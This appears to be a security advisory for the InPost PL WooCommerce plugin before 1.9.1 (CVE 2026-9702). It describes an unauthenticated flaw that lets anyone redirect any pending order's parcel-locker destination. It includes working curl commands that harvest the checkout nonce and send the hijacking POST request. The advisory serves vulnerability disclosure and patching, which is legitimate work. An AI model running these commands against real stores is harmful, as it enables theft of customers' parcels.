InPost PL < 1.9.1 – Unauthenticated WooCommerce Order Parcel-Locker Hijacking | CVE 2026-9702

Description

The plugin does not verify that the request originates from the legitimate buyer before allowing the WooCommerce order parcel-locker destination to be updated, allowing unauthenticated attackers to silently redirect the shipping destination of any pending or processing order on the site.

Proof of Concept

Prerequisites:
- WooCommerce active.
- At least one published product (note its ID as PRODUCT_ID).
- One pending or processing WooCommerce order on the site (note its ID as ORDER_ID and its current `_parcel_machine_id` meta as the baseline).

Steps:

1. As an anonymous visitor (no cookies, no account), add the product to the cart, then GET /checkout/ to harvest the easypack_nonce from the page output:

```
COOKIES=$(mktemp)
curl -sk -L -c "$COOKIES" "https://TARGET/?add-to-cart=PRODUCT_ID" -o /dev/null
NONCE=$(curl -sk -L -b "$COOKIES" "https://TARGET/checkout/" \
  | grep -oE '"security":"[a-f0-9]+"' | head -1 \
  | sed -E 's/.*"([a-f0-9]+)"/\1/')
```

2. Submit the exploit POST (still anonymous):

```
curl -sk -i -X POST 'https://TARGET/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=update_locker_from_typ_page' \
  --data-urlencode "order_id=ORDER_ID" \
  --data-urlencode 'inpost_pl_locker=ATTACKER-LOCKER-CODE' \
  --data-urlencode 'inpost_pl_locker_desc=ul. Attacker 1, Warsaw' \
  --data-urlencode "security=${NONCE}"
```

Expected response: HTTP 200 with body `{"success":true,"data":"locker_updated"}`.

3. Confirm the order's `_parcel_machine_id` post meta now equals `ATTACKER-LOCKER-CODE`. The merchant's eventual InPost label-print routes the parcel to the attacker-chosen locker.

The exploit works cross-customer: the same anonymously-minted nonce is valid for any pending/processing order ID on the site.